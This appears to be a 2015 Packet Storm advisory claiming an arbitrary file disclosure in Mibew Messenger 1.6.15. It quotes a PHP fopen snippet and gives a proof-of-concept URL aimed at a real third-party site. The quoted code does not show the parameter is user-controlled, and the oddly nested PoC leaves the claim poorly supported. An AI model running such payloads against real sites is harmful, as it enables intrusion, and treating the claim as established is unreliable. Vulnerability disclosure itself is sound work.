Mibew Messenger 1.6.15 Arbitrary File Disclosure

2015-12-08T00:00:00
ID PACKETSTORM:134683
Type packetstorm
Reporter indoushka
Modified 2015-12-08T00:00:00

Description

                                        
                                            `| # Title : Mibew Messenger 1.6.15 File Accses Vulnerability  
| # Author : indoushka   
| # email : indoushka4ever@gmail.com   
| # Dork : Mibew Messenger 1.6.15 | (c) 2011-2015 mibew.org  
| # Tested on: windows 8.1 Français V.(Pro)   
| # Download : http://mibew.org/   
=======================================  
  
C:\web\www\mibew1615\install\index.php  
Line : 95  
Function : fopen  
Variable : $packageFile  
+++++  
$fp = @fopen($packageFile, "r");  
if ($fp === FALSE) {  
$errors[] = getlocal2("install.cannot_read", array("$mibewroot/install/package"));  
if (file_exists($packageFile)) {  
$errors[] = getlocal2("install.check_permissions", array(fpermissions($packageFile)));  
}  
+++++  
  
Poc :  
  
http://www.cdl.med.br/atendimento/install/index.php?packageFile=/atendimento/install/dbinfo.php?packageFile=atendimento  
  
  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/  
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net  
---------------------------------------------------------------------------------------------------------------  
`